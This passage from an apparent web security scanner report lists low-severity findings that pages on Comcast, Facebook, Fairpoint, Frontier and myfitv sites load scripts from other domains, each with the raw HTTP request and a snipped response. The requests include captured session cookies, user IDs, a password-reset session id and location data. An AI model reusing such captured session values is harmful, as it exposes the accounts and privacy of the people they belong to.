<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...
<!-- END custom searchforce integration -->


<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
<!-- /wrapper -->
   

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</SCRIPT>


<script src="http://munchkin.marketo.net/munchkin.js"
type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.53. http://www.comcast.com/Corporate/Customers/custcare.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Corporate/Customers/custcare.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Corporate/Customers/custcare.html HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; mbox=session#1315327839174-766376#1315331731|PC#1315327839174-766376.19#1316539471|check#true#1315329931; fsr.s={"v":1,"pv":4,"lc":{"d0":{"v":4,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; fsr.a=1315329871900; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331670936%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331671920%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 18 Aug 2011 20:12:14 GMT
Accept-Ranges: bytes
ETag: "023a51ee35dcc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Tue, 06 Sep 2011 12:24:32 GMT
Connection: close
Content-Length: 25439

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><ti
...[SNIP]...
<DIV id=playlink style="Z-INDEX: 2; LEFT: 0px; WIDTH: 300px; POSITION: absolute; TOP: 0px; HEIGHT: 226px" align=left>
<SCRIPT src="http://comcast.vo.llnwd.net/d1/u/ccom/prod/MediaLibrary/1/1/LimeLight/Video/swfobject.js" type=text/javascript></SCRIPT>

<SCRIPT src="http://comcast.vo.llnwd.net/d1/u/ccom/prod/MediaLibrary/1/1/LimeLight/Video/videoPlayerFunctions.js" type=text/javascript></SCRIPT>
...[SNIP]...

16.54. http://www.comcast.com/Movers/Move.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Movers/Move.cspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Movers/Move.cspx HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331605|check#true#1315329805|PC#1315327839174-766376.19#1316539345; bn_u=6923713561343025788; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331544344%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331545589%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329851040'%255D%255D%7C1473182651040%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 54374
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:24:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <script type="text
...[SNIP]...
<div id="wrapper">
<script src="http://www.xfinity.com/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2" type="text/javascript">..</script>
...[SNIP]...

16.55. https://www.comcast.com/Localization/Localize.cspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Localization/Localize.cspx?Referer=%2fshop%2fbuyflow%2fdefault.ashx%3farea%3d6%26SourcePage%3dVOIP HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://shop.comcast.com/XFINITY/voice/?CMP=KNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136&iq_id=34270410
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; mbox=check#true#1315327900|session#1315327839174-766376#1315329700; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315329639203%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%255D%7C1473180639972%3B%20gpv_07%3Doto%25202010%2520mvt%2520--%2520cdv02%7C1315330156032%3B; s_sess=%20s_cc%3Dtrue%3B%20cf%3D1%3B%20SC_LINKS%3Doto%25202010%2520mvt%2520--%2520cdv02%255E%255Eversion_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255Eoto%25202010%2520mvt%2520--%2520cdv02%2520%257C%2520version_1%252Fassets%252Fimages%252Fcheck_availability_button.jpg%255E%255E%3B%20c%3Dtelephone%252BserviceKNC-IQ_ID_34270410-VQ2-g-VQ3--VQ6-14654906136www.google.com%3B%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20s_sq%3Dcomcastdotcomprod%253D%252526pid%25253Doto%252525202010%25252520mvt%25252520--%25252520cdv02%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.comcast.com%2525252Fshop%2525252Fbuyflow%2525252Fdefault.ashx%2525253FSourcePage%2525253DVOIP_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 11:59:19 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24148
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...
<div id="main">
   
    <script src="https://secure.xfinity.com/js-api/compressed/xpbar.js?id=xbardiv&amp;highlight=comcastcom&amp;version=2" type="text/javascript">..</script>
...[SNIP]...

16.56. https://www.comcastsupport.com/ChatEntry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /ChatEntry/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ChatEntry/ HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool-ecare-chat-wg=539881797.20480.0000; s_pers=%20s_dfa%3Dcomcastdotcomqa%7C1315331924632%3B; s_cc=true; s_sq=%5B%5BB%5D%5D; ASPSESSIONIDQCTDTTCS=IGBCFBNCPIHMMIJJLOJIMBMI; ASPSESSIONIDQASCSTCT=PNCAEBNCKLLFGDNPGFOIEALJ

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="https://www.comcast.com/includes/omniture/s_code.js"></script>
...[SNIP]...

16.57. https://www.comcastsupport.com/chatentry/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcastsupport.com
Path:   /chatentry/Default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /chatentry/Default.aspx HTTP/1.1
Host: www.comcastsupport.com
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76554


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<sc
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="https://www.comcast.com/includes/omniture/s_code.js"></script>
...[SNIP]...

16.58. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?api_key=210163452329780&border_color=%23fff&font=lucida%20grande&header=false&height=400&locale=en_US&recommendations=true&ref=mod_fba_home&sdk=joey&site=myfitv.com&width=286 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.143.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:43 GMT
Content-Length: 15660

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="qvEJ";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

16.59. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?api_key=210163452329780&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25493d93%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=254&href=http%3A%2F%2Fwww.facebook.com%2Fmyfitv&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.139.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:41 GMT
Content-Length: 12771

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js"></script>
...[SNIP]...

16.60. http://www.fairpoint.com/residential/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /residential/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /residential/ HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0; __utma=35652279.1641746484.1315328322.1315328322.1315328322.1; __utmc=35652279; __utmz=35652279.1315328322.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fp_audience=residential; fp_state=VT; fp_city=Westfield; newloc=1; fp_zip=05874; fp_telco=NNE-VT

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Set-Cookie: activeBU=Residential; Expires=Tue, 06-Sep-2011 14:10:45 GMT; Path=/
Content-Type: text/html
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

16.61. http://www.frontier.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=ks40bd45i0qr22450as2ev2m; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="icon" href="h
...[SNIP]...
</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript" ></script>
...[SNIP]...
<!-- Begin: www.iperceptions.com -->
<script src="http://ips-invite.iperceptions.com/webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY&cD=90&rF=False&iType=1&domainname=0" type="text/javascript" defer="defer" ></script>
...[SNIP]...

16.62. http://www.myfitv.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:45:29 GMT
ETag: "1c6dae7fdca3cc1a86a9e8a293c50cc1"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.123781
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 77353
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

16.63. http://www.myfitv.com/portal/recent_tv_elastic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /portal/recent_tv_elastic

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/recent_tv_elastic HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:29:50 GMT
ETag: "2698e5fdf58407cf7613e37e2b5b9b8c"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.026102
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 29645
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Yahoo Portal Module</title>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

16.64. http://www.myfitv.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?utf8=%E2%9C%93&query=xss HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:50:36 GMT
ETag: "b06b1c86b03c05bca43a7628c5a0a319"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIiUvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyIPc2Vzc2lvbl9pZCIlNGJlNWEzNzEyYTUxMzU2ZTk3NjdhZGUwZmQ4MGQ1MDg%3D--93112ebe330134a19c07b42f1f52e133e4c4f31d; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.106563
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 30810
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
